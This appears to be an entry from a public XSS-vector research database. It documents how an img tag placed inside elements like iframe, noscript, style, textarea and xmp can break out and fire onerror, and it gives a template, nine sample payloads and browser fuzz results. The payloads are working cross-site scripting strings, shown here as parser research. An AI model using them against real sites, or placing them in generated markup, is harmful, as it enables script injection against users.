XSS vectors that consume tag
9
9This vector shows which events fire without user interaction
Created by: Y4tacker
Created on: Tuesday, November 5, 2024 at 8:04:13 AM
Updated on: Wednesday, May 28, 2025 at 11:16:42 AM
Category: HTML Parsing
Vector visibility: Public
Vector type: XSS
Vector charset: UTF-8
Vector data 1: html
Template used:
<$[data1]><img title="</$[data1]><img src=x onerror=log('$[data1]')>"></$[data1]>Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...
Sample payloads
<iframe><img title="</iframe><img src=x onerror=alert('iframe')>"></iframe><noembed><img title="</noembed><img src=x onerror=alert('noembed')>"></noembed><noframes><img title="</noframes><img src=x onerror=alert('noframes')>"></noframes><noscript><img title="</noscript><img src=x onerror=alert('noscript')>"></noscript><script><img title="</script><img src=x onerror=alert('script')>"></script><style><img title="</style><img src=x onerror=alert('style')>"></style><textarea><img title="</textarea><img src=x onerror=alert('textarea')>"></textarea><title><img title="</title><img src=x onerror=alert('title')>"></title><xmp><img title="</xmp><img src=x onerror=alert('xmp')>"></xmp>Fuzz results
Chrome 129.0.0.0 desktop macOS 10.15.7
Updated
Tue Nov 05 2024
Found 9 results
Loading...
Chrome 140.0.0.0 desktop Windows NT 10.0
Updated
Tue Sep 09 2025
Found 9 results
Loading...
Firefox 115.0 desktop Windows NT 6.1
Updated
Sat Sep 13 2025
Found 9 results
Loading...